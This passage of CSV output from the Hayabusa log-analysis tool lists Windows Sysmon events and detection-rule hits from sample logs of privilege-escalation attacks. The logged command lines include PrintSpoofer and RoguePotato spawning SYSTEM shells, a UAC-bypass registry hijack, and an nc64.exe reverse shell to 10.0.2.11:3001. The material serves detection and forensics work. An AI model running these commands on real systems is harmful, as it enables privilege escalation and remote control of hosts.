| PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\Temp | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCache | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetHistory | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCookies | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc | LID: 0x1d39b | PID: 5840 | PGUID: 747F3D96-B76F-5EA4-0000-0010624D0600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe 
-k netsvcs -p -s Appinfo | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6964 | PGUID: 747F3D96-B776-5EA4-0000-0010A74D0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x1d39b | PID: 7000 | PGUID: 747F3D96-B776-5EA4-0000-001006590B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 6656 | PGUID: 747F3D96-B79B-5EA4-0000-00105BD50F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 318 0000021FF2606500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6648 | PGUID: 747F3D96-B79B-5EA4-0000-001075DA0F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 748 | PGUID: 747F3D96-B79B-5EA4-0000-001001FC0F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Discovery - domain time | Cmd: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 | Process: C:\BGinfo\BGINFO.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 7056 | PGUID: 747F3D96-B7A0-5EA4-0000-001026D11000 | Hash: SHA1=1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25,MD5=3652BA8B882BF6C69AF70CE73CF0D616,SHA256=0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D,IMPHASH=6EC19FF15BC88DDEDB96115003A96430",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\SecurityHealthService.exe | Process: C:\Windows\System32\SecurityHealthService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 7088 | PGUID: 747F3D96-B7A0-5EA4-0000-001027D81000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x1d39b | PID: 3376 | PGUID: 747F3D96-B7A0-5EA4-0000-00108D131100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 864 | PGUID: 747F3D96-B7A2-5EA4-0000-0010982F1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 3256 | PGUID: 747F3D96-B7A5-5EA4-0000-0010CAB51300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 258 0000021FF266EC20 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7036 | PGUID: 747F3D96-B7A5-5EA4-0000-0010EAB91300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 
4480 | PGUID: 747F3D96-B7AA-5EA4-0000-001066001700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2792 | PGUID: 747F3D96-B7D4-5EA4-0000-0010E09B1700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 6548 | PGUID: 747F3D96-B7DE-5EA4-0000-0010FA4E1800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 992 | PGUID: 747F3D96-B7DF-5EA4-0000-001052671800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 
0x3e5 | PID: 1396 | PGUID: 747F3D96-B7DF-5EA4-0000-001080711800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-05-03 03:01:52.553 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 7212 | PGUID: 747F3D96-B49D-5EAD-0000-001029FEBE00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PrintSpoofer.exe -i -c powershell.exe | Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x812b1 | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\spoolss | Process: 
c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: System | PID: 4 | PGUID: 747F3D96-6AB8-5EAD-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: powershell.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PrintSpoofer.exe -i -c powershell.exe | LID: 0x3e7 | PID: 1428 | PGUID: 747F3D96-B592-5EAD-0000-0010D4CDC200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: 
powershell.exe | LID: 0x3e7 | PID: 6004 | PGUID: 747F3D96-B595-5EAD-0000-00106BFDC200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-07 22:13:01.683 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - T1088 - UACBypass - changepk UACME61 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Launcher.SystemSettings\shell\open\command\(Default): c:\Windows\System32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 7084 | PGUID: 747F3D96-095D-5EB4-0000-001082FF1700,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx +2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\ChangePk.exe"" | LID: 0x2ecba | PID: 5216 | PGUID: 
747F3D96-095E-5EB4-0000-0010D46F1800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx +2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | Process: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.647 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\frAQBc8Wsa1 | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.662 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\frAQBc8Wsa1 | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 
747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | LID: 0x3e7 | PID: 372 | PGUID: 747F3D96-4640-5EB7-0000-0010EF364B01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | 
Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 7672 | PGUID: 747F3D96-4647-5EB7-0000-0010B3454B01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 180 | PGUID: 
747F3D96-46A4-5EB7-0000-00109FE74C01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:11:20.824 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.101:49683 (MSEDGEWIN10) | Dst: 192.168.56.1:139 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | Process: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: c:\Users\IEUser\tools\PrivEsc\RoguePotato.exe | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 